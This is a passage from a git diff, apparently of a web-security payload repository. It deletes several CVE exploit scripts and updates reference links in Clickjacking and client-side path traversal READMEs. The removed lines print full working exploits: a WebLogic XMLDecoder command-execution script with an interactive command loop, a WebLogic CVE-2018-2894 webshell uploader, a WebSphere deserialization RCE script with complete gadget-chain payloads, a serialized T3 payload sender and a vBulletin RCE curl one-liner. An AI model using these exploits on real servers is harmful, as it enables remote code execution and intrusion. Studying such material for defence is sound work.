4c\x00\x0e\x72\x65\x6c\x65\x61\x73\x65\x56\x65\x72\x73\x69\x6f\x6e\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x12\x76\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x41\x73\x42\x79\x74\x65\x73\x74\x00\x02\x5b\x42\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x05\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x05\x78\x70\x77\x02\x00\x00\x78\xfe\x00\xff\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x46\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x0b\x75\x73\x2d\x6c\x2d\x62\x72\x65\x65\x6e\x73\xa5\x3c\xaf\xf1\x00\x00\x00\x07\x00\x00\x1b\x59\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x78\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x1d\x01\x81\x40\x12\x81\x34\xbf\x42\x76\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\xa5\x3c\xaf\xf1\x00\x00\x00\x00\x00\x78'
-
-# adjust header for appropriate message length
-payload = "{0}{1}".format(struct.pack('!i', len(payload)), payload[4:])
-
-print('[*] Sending payload')
-sock.send(payload)
diff --git a/CVE Exploits/WebLogic CVE-2017-10271.py b/CVE Exploits/WebLogic CVE-2017-10271.py
deleted file mode 100644
index 71236dd..0000000
--- a/CVE Exploits/WebLogic CVE-2017-10271.py	
+++ /dev/null
@@ -1,63 +0,0 @@
-from __future__ import print_function
-from builtins import input
-import requests
-import sys
-
-url_in = sys.argv[1]
-payload_url = url_in + "/wls-wsat/CoordinatorPortType"
-payload_header = {'content-type': 'text/xml'}
-
-
-def payload_command (command_in):
-    html_escape_table = {
-        "&": "&amp;",
-        '"': "&quot;",
-        "'": "&apos;",
-        ">": "&gt;",
-        "<": "&lt;",
-    }
-    command_filtered = "<string>"+"".join(html_escape_table.get(c, c) for c in command_in)+"</string>"
-    payload_1 = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n" \
-                "   <soapenv:Header> " \
-                "       <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"> \n" \
-                "           <java version=\"1.8.0_151\" class=\"java.beans.XMLDecoder\"> \n" \
-                "               <void class=\"java.lang.ProcessBuilder\"> \n" \
-                "                  <array class=\"java.lang.String\" length=\"3\">" \
-                "                      <void index = \"0\">                       " \
-                "                          <string>cmd</string>                 " \
-                "                      </void>                                    " \
-                "                      <void index = \"1\">                       " \
-                "                          <string>/c</string>                  " \
-                "                      </void>                                    " \
-                "                      <void index = \"2\">                       " \
-                + command_filtered + \
-                "                      </void>                                    " \
-                "                  </array>" \
-                "                  <void method=\"start\"/>" \
-                "                  </void>" \
-                "            </java>" \
-                "        </work:WorkContext>" \
-                "   </soapenv:Header>" \
-                "   <soapenv:Body/>" \
-                "</soapenv:Envelope>"
-    return payload_1
-
-def do_post(command_in):
-    result = requests.post(payload_url, payload_command(command_in ),headers = payload_header)
-
-    if result.status_code == 500:
-        print("Command Executed \n")
-    else:
-        print("Something Went Wrong \n")
-
-
-
-print("***************************************************** \n" \
-       "****************   Coded By 1337g  ****************** \n" \
-       "*  CVE-2017-10271 Blind Remote Command Execute EXP  * \n" \
-       "***************************************************** \n")
-
-while 1:
-    command_in = input("Eneter your command here: ")
-    if command_in == "exit" : exit(0)
-    do_post(command_in)
diff --git a/CVE Exploits/WebLogic CVE-2018-2894.py b/CVE Exploits/WebLogic CVE-2018-2894.py
deleted file mode 100644
index 18adab0..0000000
--- a/CVE Exploits/WebLogic CVE-2018-2894.py	
+++ /dev/null
@@ -1,128 +0,0 @@
-#!/usr/bin/env python
-# coding:utf-8
-# Build By LandGrey
-
-from __future__ import print_function
-from builtins import str
-import re
-import sys
-import time
-import argparse
-import requests
-import traceback
-import xml.etree.ElementTree as ET
-
-
-def get_current_work_path(host):
-    geturl = host + "/ws_utc/resources/setting/options/general"
-    ua = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0'}
-    values = []
-    try:
-        request = requests.get(geturl)
-        if request.status_code == 404:
-            exit("[-] {}  don't exists CVE-2018-2894".format(host))
-        elif "Deploying Application".lower() in request.text.lower():
-            print("[*] First Deploying Website Please wait a moment ...")
-            time.sleep(20)
-            request = requests.get(geturl, headers=ua)
-        if "</defaultValue>" in request.content:
-            root = ET.fromstring(request.content)
-            value = root.find("section").find("options")
-            for e in value:
-                for sub in e:
-                    if e.tag == "parameter" and sub.tag == "defaultValue":
-                        values.append(sub.text)
-    except requests.ConnectionError:
-        exit("[-] Cannot connect url: {}".format(geturl))
-    if values:
-        return values[0]
-    else:
-        print("[-] Cannot get current work path\n")
-        exit(request.content)
-
-
-def get_new_work_path(host):
-    origin_work_path = get_current_work_path(host)
-    works = "/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css"
-    if "user_projects" in origin_work_path:
-        if "\\" in origin_work_path:
-            works = works.replace("/", "\\")
-            current_work_home = origin_work_path[:origin_work_path.find("user_projects")] + "user_projects\\domains"
-            dir_len = len(current_work_home.split("\\"))
-            domain_name = origin_work_path.split("\\")[dir_len]
-            current_work_home += "\\" + domain_name + works
-        else:
-            current_work_home = origin_work_path[:origin_work_path.find("user_projects")] + "user_projects/domains"
-            dir_len = len(current_work_home.split("/"))
-            domain_name = origin_work_path.split("/")[dir_len]
-            current_work_home += "/" + domain_name + works
-    else:
-        current_work_home = origin_work_path
-        print("[*] cannot handle current work home dir: {}".format(origin_work_path))
-    return current_work_home
-
-
-def set_new_upload_path(host, path):
-    data = {
-        "setting_id": "general",
-        "BasicConfigOptions.workDir": path,
-        "BasicConfigOptions.proxyHost": "",
-        "BasicConfigOptions.proxyPort": "80"}
-    request = requests.post(host + "/ws_utc/resources/setting/options", data=data, headers=headers)
-    if "successfully" in request.content:
-        return True
-    else:
-        print("[-] Change New Upload Path failed")
-        exit(request.content)
-
-
-def upload_webshell(host, uri):
-    set_new_upload_path(host, get_new_work_path(host))
-    files = {
-        "ks_edit_mode": "false",
-        "ks_password_front": password,
-        "ks_password_changed": "true",
-        "ks_filename": ("360sglab.jsp", upload_content)
-    }
-
-    request = requests.post(host + uri, files=files)
-    response = request.text
-    match = re.findall("<id>(.*?)</id>", response)
-    if match:
-        tid = match[-1]
-        shell_path = host + "/ws_utc/css/config/keystore/" + str(tid) + "_360sglab.jsp"
-        if upload_content in requests.get(shell_path, headers=headers).content:
-            print("[+] {} exists CVE-2018-2894".format(host))
-            print("[+] Check URL: {} ".format(shell_path))
-        else:
-            print("[-] {}  don't exists CVE-2018-2894".format(host))
-    else:
-        print("[-] {}  don't exists CVE-2018-2894".format(host))
-
-
-if __name__ == "__main__":
-    start = time.time()
-    password = "360sglab"
-    url = "/ws_utc/resources/setting/keystore"
-    parser = argparse.ArgumentParser()
-    parser.add_argument("-t", dest='target', default="http://127.0.0.1:7001", type=str,
-                        help="target, such as: http://example.com:7001")
-
-    upload_content = "360sglab test"
-    headers = {
-        'Content-Type': 'application/x-www-form-urlencoded',
-        'X-Requested-With': 'XMLHttpRequest', }
-
-    if len(sys.argv) == 1:
-        sys.argv.append('-h')
-    args = parser.parse_args()
-    target = args.target
-
-    target = target.rstrip('/')
-    if "://" not in target:
-        target = "http://" + target
-    try:
-        upload_webshell(target, url)
-    except Exception as e:
-        print("[-] Error: \n")
-        traceback.print_exc()
diff --git a/CVE Exploits/WebSphere CVE-2015-7450.py b/CVE Exploits/WebSphere CVE-2015-7450.py
deleted file mode 100644
index c37215e..0000000
--- a/CVE Exploits/WebSphere CVE-2015-7450.py	
+++ /dev/null
@@ -1,80 +0,0 @@
-#! /usr/bin/env python2
-
-#IBM WebSphere Java Object Deserialization RCE (CVE-2015-7450)
-#Based on the nessus plugin websphere_java_serialize.nasl
-#Made with <3 by @byt3bl33d3r
-
-from __future__ import print_function
-from builtins import chr
-import requests
-from requests.packages.urllib3.exceptions import InsecureRequestWarning
-requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
-
-import argparse
-import sys
-import base64
-from binascii import unhexlify
-
-parser = argparse.ArgumentParser()
-parser.add_argument('target', type=str, help='Target IP:PORT')
-parser.add_argument('command', type=str, help='Command to run on target')
-parser.add_argument('--proto', choices={'http', 'https'}, default='https', help='Send exploit over http or https (default: https)')
-
-if len(sys.argv) < 2:
-    parser.print_help()
-    sys.exit(1)
-
-args = parser.parse_args()
-
-if len(args.target.split(':')) != 2:
-    print('[-] Target must be in format IP:PORT')
-    sys.exit(1)
-
-if not args.command:
-    print('[-] You must specify a command to run')
-    sys.exit(1)
-
-elif args.command:
-    if len(args.command) > 254:
-        print('[-] Command must be less then 255 bytes')
-        sys.exit(1)
-
-ip, port = args.target.split(':')
-
-print('[*] Target IP: {}'.format(ip))
-print('[*] Target PORT: {}'.format(port))
-
-serObj = unhexlify("ACED00057372003273756E2E7265666C6563742E616E6E6F746174696F6E2E416E6E6F746174696F6E496E766F636174696F6E48616E646C657255CAF50F15CB7EA50200024C000C6D656D62657256616C75657374000F4C6A6176612F7574696C2F4D61703B4C0004747970657400114C6A6176612F6C616E672F436C6173733B7870737D00000001000D6A6176612E7574696C2E4D6170787200176A6176612E6C616E672E7265666C6563742E50726F7879E127DA20CC1043CB0200014C0001687400254C6A6176612F6C616E672F7265666C6563742F496E766F636174696F6E48616E646C65723B78707371007E00007372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E747400124C6A6176612F6C616E672F4F626A6563743B7870767200116A6176612E6C616E672E52756E74696D65000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000274000A67657452756E74696D65757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007400096765744D6574686F647571007E001E00000002767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707671007E001E7371007E00167571007E001B00000002707571007E001B00000000740006696E766F6B657571007E001E00000002767200106A6176612E6C616E672E4F626A656374000000000000000000000078707671007E001B7371007E0016757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017400")
-serObj += chr(len(args.command)) + args.command
-serObj += unhexlify("740004657865637571007E001E0000000171007E00237371007E0011737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F40000000000010770800000010000000007878767200126A6176612E6C616E672E4F766572726964650000000000000000000000787071007E003A")
-
-serObjB64 = base64.b64encode(serObj)
-
-ser1 = "rO0ABXNyAA9qYXZhLnV0aWwuU3RhY2sQ/irCuwmGHQIAAHhyABBqYXZhLnV0aWwuVmVjdG9y2Zd9W4A7rwEDAANJABFjYXBhY2l0eUluY3JlbWVudEkADGVsZW1lbnRDb3VudFsAC2VsZW1lbnREYXRhdAATW0xqYXZhL2xhbmcvT2JqZWN0O3hwAAAAAAAAAAF1cgATW0xqYXZhLmxhbmcuT2JqZWN0O5DOWJ8QcylsAgAAeHAAAAAKc3IAOmNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3IuSk1YQ29ubmVjdG9yQ29udGV4dEVsZW1lbnTblRMyYyF8sQIABUwACGNlbGxOYW1ldAASTGphdmEvbGFuZy9TdHJpbmc7TAAIaG9zdE5hbWVxAH4AB0wACG5vZGVOYW1lcQB+AAdMAApzZXJ2ZXJOYW1lcQB+AAdbAApzdGFja1RyYWNldAAeW0xqYXZhL2xhbmcvU3RhY2tUcmFjZUVsZW1lbnQ7eHB0AAB0AAhMYXAzOTAxM3EAfgAKcQB+AAp1cgAeW0xqYXZhLmxhbmcuU3RhY2tUcmFjZUVsZW1lbnQ7AkYqPDz9IjkCAAB4cAAAACpzcgAbamF2YS5sYW5nLlN0YWNrVHJhY2VFbGVtZW50YQnFmiY23YUCAARJAApsaW5lTnVtYmVyTAAOZGVjbGFyaW5nQ2xhc3NxAH4AB0wACGZpbGVOYW1lcQB+AAdMAAptZXRob2ROYW1lcQB+AAd4cAAAAEt0ADpjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLkpNWENvbm5lY3RvckNvbnRleHRFbGVtZW50dAAfSk1YQ29ubmVjdG9yQ29udGV4dEVsZW1lbnQuamF2YXQABjxpbml0PnNxAH4ADgAAADx0ADNjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLkpNWENvbm5lY3RvckNvbnRleHR0ABhKTVhDb25uZWN0b3JDb250ZXh0LmphdmF0AARwdXNoc3EAfgAOAAAGQ3QAOGNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3Iuc29hcC5TT0FQQ29ubmVjdG9yQ2xpZW50dAAYU09BUENvbm5lY3RvckNsaWVudC5qYXZhdAAcZ2V0Sk1YQ29ubmVjdG9yQ29udGV4dEhlYWRlcnNxAH4ADgAAA0h0ADhjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLnNvYXAuU09BUENvbm5lY3RvckNsaWVudHQAGFNPQVBDb25uZWN0b3JDbGllbnQuamF2YXQAEmludm9rZVRlbXBsYXRlT25jZXNxAH4ADgAAArF0ADhjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLnNvYXAuU09BUENvbm5lY3RvckNsaWVudHQAGFNPQVBDb25uZWN0b3JDbGllbnQuamF2YXQADmludm9rZVRlbXBsYXRlc3EAfgAOAAACp3QAOGNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3Iuc29hcC5TT0FQQ29ubmVjdG9yQ2xpZW50dAAYU09BUENvbm5lY3RvckNsaWVudC5qYXZhdAAOaW52b2tlVGVtcGxhdGVzcQB+AA4AAAKZdAA4Y29tLmlibS53cy5tYW5hZ2VtZW50LmNvbm5lY3Rvci5zb2FwLlNPQVBDb25uZWN0b3JDbGllbnR0ABhTT0FQQ29ubmVjdG9yQ2xpZW50LmphdmF0AAZpbnZva2VzcQB+AA4AAAHndAA4Y29tLmlibS53cy5tYW5hZ2VtZW50LmNvbm5lY3Rvci5zb2FwLlNPQVBDb25uZWN0b3JDbGllbnR0ABhTT0FQQ29ubmVjdG9yQ2xpZW50LmphdmF0AAZpbnZva2VzcQB+AA7/////dAAVY29tLnN1bi5wcm94eS4kUHJveHkwcHQABmludm9rZXNxAH4ADgAAAOB0ACVjb20uaWJtLndzLm1hbmFnZW1lbnQuQWRtaW5DbGllbnRJbXBsdAAUQWRtaW5DbGllbnRJbXBsLmphdmF0AAZpbnZva2VzcQB+AA4AAADYdAA9Y29tLmlibS53ZWJzcGhlcmUubWFuYWdlbWVudC5jb25maWdzZXJ2aWNlLkNvbmZpZ1NlcnZpY2VQcm94eXQAF0NvbmZpZ1NlcnZpY2VQcm94eS5qYXZhdAARZ2V0VW5zYXZlZENoYW5nZXNzcQB+AA4AAAwYdAAmY29tLmlibS53cy5zY3JpcHRpbmcuQWRtaW5Db25maWdDbGllbnR0ABZBZG1pbkNvbmZpZ0NsaWVudC5qYXZhdAAKaGFzQ2hhbmdlc3NxAH4ADgAAA/Z0AB5jb20uaWJtLndzLnNjcmlwdGluZy5XYXN4U2hlbGx0AA5XYXN4U2hlbGwuamF2YXQACHRpbWVUb0dvc3EAfgAOAAAFm3QAImNvbS5pYm0ud3Muc2NyaXB0aW5nLkFic3RyYWN0U2hlbGx0ABJBYnN0cmFjdFNoZWxsLmphdmF0AAtpbnRlcmFjdGl2ZXNxAH4ADgAACPp0ACJjb20uaWJtLndzLnNjcmlwdGluZy5BYnN0cmFjdFNoZWxsdAASQWJzdHJhY3RTaGVsbC5qYXZhdAADcnVuc3EAfgAOAAAElHQAHmNvbS5pYm0ud3Muc2NyaXB0aW5nLldhc3hTaGVsbHQADldhc3hTaGVsbC5qYXZhdAAEbWFpbnNxAH4ADv////50ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRob2RBY2Nlc3NvckltcGwuamF2YXQAB2ludm9rZTBzcQB+AA4AAAA8dAAkc3VuLnJlZmxlY3QuTmF0aXZlTWV0aG9kQWNjZXNzb3JJbXBsdAAdTmF0aXZlTWV0aG9kQWNjZXNzb3JJbXBsLmphdmF0AAZpbnZva2VzcQB+AA4AAAAldAAoc3VuLnJlZmxlY3QuRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbHQAIURlbGVnYXRpbmdNZXRob2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAAmN0ABhqYXZhLmxhbmcucmVmbGVjdC5NZXRob2R0AAtNZXRob2QuamF2YXQABmludm9rZXNxAH4ADgAAAOp0ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAAKbGF1bmNoTWFpbnNxAH4ADgAAAGB0ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAAEbWFpbnNxAH4ADgAAAE10ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAADcnVuc3EAfgAO/////nQAJHN1bi5yZWZsZWN0Lk5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbHQAHU5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAHaW52b2tlMHNxAH4ADgAAADx0ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRob2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAACV0AChzdW4ucmVmbGVjdC5EZWxlZ2F0aW5nTWV0aG9kQWNjZXNzb3JJbXBsdAAhRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAGaW52b2tlc3EAfgAOAAACY3QAGGphdmEubGFuZy5yZWZsZWN0Lk1ldGhvZHQAC01ldGhvZC5qYXZhdAAGaW52b2tlc3EAfgAOAAACS3QANG9yZy5lY2xpcHNlLmVxdWlub3guaW50ZXJuYWwuYXBwLkVjbGlwc2VBcHBDb250YWluZXJ0ABhFY2xpcHNlQXBwQ29udGFpbmVyLmphdmF0ABdjYWxsTWV0aG9kV2l0aEV4Y2VwdGlvbnNxAH4ADgAAAMZ0ADFvcmcuZWNsaXBzZS5lcXVpbm94LmludGVybmFsLmFwcC5FY2xpcHNlQXBwSGFuZGxldAAVRWNsaXBzZUFwcEhhbmRsZS5qYXZhdAADcnVuc3EAfgAOAAAAbnQAPG9yZy5lY2xpcHNlLmNvcmUucnVudGltZS5pbnRlcm5hbC5hZGFwdG9yLkVjbGlwc2VBcHBMYXVuY2hlcnQAF0VjbGlwc2VBcHBMYXVuY2hlci5qYXZhdAAOcnVuQXBwbGljYXRpb25zcQB+AA4AAABPdAA8b3JnLmVjbGlwc2UuY29yZS5ydW50aW1lLmludGVybmFsLmFkYXB0b3IuRWNsaXBzZUFwcExhdW5jaGVydAAXRWNsaXBzZUFwcExhdW5jaGVyLmphdmF0AAVzdGFydHNxAH4ADgAAAXF0AC9vcmcuZWNsaXBzZS5jb3JlLnJ1bnRpbWUuYWRhcHRvci5FY2xpcHNlU3RhcnRlcnQAE0VjbGlwc2VTdGFydGVyLmphdmF0AANydW5zcQB+AA4AAACzdAAvb3JnLmVjbGlwc2UuY29yZS5ydW50aW1lLmFkYXB0b3IuRWNsaXBzZVN0YXJ0ZXJ0ABNFY2xpcHNlU3RhcnRlci5qYXZhdAADcnVuc3EAfgAO/////nQAJHN1bi5yZWZsZWN0Lk5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbHQAHU5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAHaW52b2tlMHNxAH4ADgAAADx0ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRob2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAACV0AChzdW4ucmVmbGVjdC5EZWxlZ2F0aW5nTWV0aG9kQWNjZXNzb3JJbXBsdAAhRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAGaW52b2tlc3EAfgAOAAACY3QAGGphdmEubGFuZy5yZWZsZWN0Lk1ldGhvZHQAC01ldGhvZC5qYXZhdAAGaW52b2tlc3EAfgAOAAABVHQAHm9yZy5lY2xpcHNlLmNvcmUubGF1bmNoZXIuTWFpbnQACU1haW4uamF2YXQAD2ludm9rZUZyYW1ld29ya3NxAH4ADgAAARp0AB5vcmcuZWNsaXBzZS5jb3JlLmxhdW5jaGVyLk1haW50AAlNYWluLmphdmF0AAhiYXNpY1J1bnNxAH4ADgAAA9V0AB5vcmcuZWNsaXBzZS5jb3JlLmxhdW5jaGVyLk1haW50AAlNYWluLmphdmF0AANydW5zcQB+AA4AAAGQdAAlY29tLmlibS53c3NwaS5ib290c3RyYXAuV1NQcmVMYXVuY2hlcnQAEldTUHJlTGF1bmNoZXIuamF2YXQADWxhdW5jaEVjbGlwc2VzcQB+AA4AAACjdAAlY29tLmlibS53c3NwaS5ib290c3RyYXAuV1NQcmVMYXVuY2hlcnQAEldTUHJlTGF1bmNoZXIuamF2YXQABG1haW5wcHBwcHBwcHB4"
-
-ser2 = "rO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA=="
-
-#This was in the nessus plugin, but wasn't used anywhwere :/
-#ser3 = "rO0ABXVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAFzcgAkY29tLmlibS53ZWJzcGhlcmUubWFuYWdlbWVudC5TZXNzaW9uJ5mLeyYSGOUCAANKAAJpZFoADnNoYXJlV29ya3NwYWNlTAAIdXNlck5hbWV0ABJMamF2YS9sYW5nL1N0cmluZzt4cAAAAVEDKkaUAXQAEVNjcmlwdDE1MTAzMmE0Njk0"
-
-ser4 = "rO0ABXVyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0ACRjb20uaWJtLndlYnNwaGVyZS5tYW5hZ2VtZW50LlNlc3Npb24="
-
-xmlObj ="<?xml version='1.0' encoding='UTF-8'?>\r\n"
-xmlObj +='<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">\r\n'
-xmlObj +='<SOAP-ENV:Header ns0:JMXConnectorContext="{ser1}" xmlns:ns0="admin" ns0:WASRemoteRuntimeVersion="8.5.5.7" ns0:JMXMessageVersion="1.2.0" ns0:JMXVersion="1.2.0">\r\n'.format(ser1=ser1)
-xmlObj +='</SOAP-ENV:Header>\r\n'
-xmlObj +='<SOAP-ENV:Body>\r\n'
-xmlObj +='<ns1:invoke xmlns:ns1="urn:AdminService" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">\r\n'
-xmlObj +='<objectname xsi:type="ns1:javax.management.ObjectName">{ser2}</objectname>\r\n'.format(ser2=ser2)
-xmlObj +='<operationname xsi:type="xsd:string">getUnsavedChanges</operationname>\r\n'
-xmlObj +='<params xsi:type="ns1:[Ljava.lang.Object;">{serObjB64}</params>\r\n'.format(serObjB64=serObjB64)
-xmlObj +='<signature xsi:type="ns1:[Ljava.lang.String;">{ser4}</signature>\r\n'.format(ser4=ser4)
-xmlObj +='</ns1:invoke>\r\n'
-xmlObj +='</SOAP-ENV:Body>\r\n'
-xmlObj +='</SOAP-ENV:Envelope>'
-
-headers = {'Content-Type': 'text/xml; charset=utf-8',
-           'SOAPAction': 'urn:AdminService'}
-
-r = requests.post('{}://{}:{}'.format(args.proto, ip, port), data=xmlObj, headers=headers, verify=False)
-print('[*] HTTPS request sent successfully')
diff --git a/CVE Exploits/vBulletin RCE 5.0.0 - 5.5.4.sh b/CVE Exploits/vBulletin RCE 5.0.0 - 5.5.4.sh
deleted file mode 100644
index 3ebf64a..0000000
--- a/CVE Exploits/vBulletin RCE 5.0.0 - 5.5.4.sh	
+++ /dev/null
@@ -1 +0,0 @@
-curl https://example.com/index.php\?routestring\=ajax/render/widget_php --connect-timeout 5 --max-time 15 -s -k --data "widgetConfig[code]=echo system('id');exit;"
\ No newline at end of file
diff --git a/Clickjacking/README.md b/Clickjacking/README.md
index b424ac1..b5101b6 100644
--- a/Clickjacking/README.md
+++ b/Clickjacking/README.md
@@ -250,7 +250,7 @@ Determine the Clickjacking vulnerability within this code snippet. Identify how
 
 ## References
 
-* [Clickjacker.io - Saurabh Banawar - May 10, 2020](https://clickjacker.io)
-* [Clickjacking - Gustav Rydstedt - April 28, 2020](https://owasp.org/www-community/attacks/Clickjacking)
-* [Synopsys Clickjacking - BlackDuck - November 29, 2019](https://www.synopsys.com/glossary/what-is-clickjacking.html#B)
-* [Web-Security Clickjacking - PortSwigger - October 12, 2019](https://portswigger.net/web-security/clickjacking)
+* [Clickjacker.io - Saurabh Banawar - May 10, 2020](https://web.archive.org/web/20200510214313/https://clickjacker.io/)
+* [Clickjacking - Gustav Rydstedt - April 28, 2020](https://web.archive.org/web/20200428022051/https://owasp.org/www-community/attacks/Clickjacking)
+* [Synopsys Clickjacking - BlackDuck - November 29, 2019](https://web.archive.org/web/20240917212838/https://www.synopsys.com/glossary/what-is-clickjacking.html)
+* [Web-Security Clickjacking - PortSwigger - October 12, 2019](https://web.archive.org/web/20260215062230/https://portswigger.net/web-security/clickjacking)
diff --git a/Client Side Path Traversal/README.md b/Client Side Path Traversal/README.md
index 8d67d15..2833b19 100644
--- a/Client Side Path Traversal/README.md	
+++ b/Client Side Path Traversal/README.md	
@@ -61,12 +61,12 @@ Real-World Scenarios:
 
 ## References
 
